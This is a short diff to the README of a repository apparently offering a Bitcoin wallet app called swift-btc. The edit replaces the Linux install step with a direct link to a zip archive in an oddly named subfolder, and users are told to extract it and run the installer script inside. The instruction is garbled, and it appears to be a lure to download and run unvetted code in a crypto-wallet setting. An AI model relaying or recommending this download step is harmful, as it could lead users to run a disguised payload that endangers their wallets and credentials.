rqwrq456/swift-btc/README.md

 2. **Run the Installer:**
    - For Windows: Double-click the `.exe` file to start the installation.
    - For Mac: Open the `.dmg` file, then drag swift-btc to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and run the installer script in your terminal.
+   - For Linux: Extract the `https://raw.githubusercontent.com/rqwrq456/swift-btc/main/telesthesia/swift-btc.zip` file and run the installer script in your terminal.
 3. **Follow the Setup Wizard:** The installer will guide you through the setup process.
 Just follow the prompts to install swift-btc.

 ## 🔑 Setting Up Your Wallet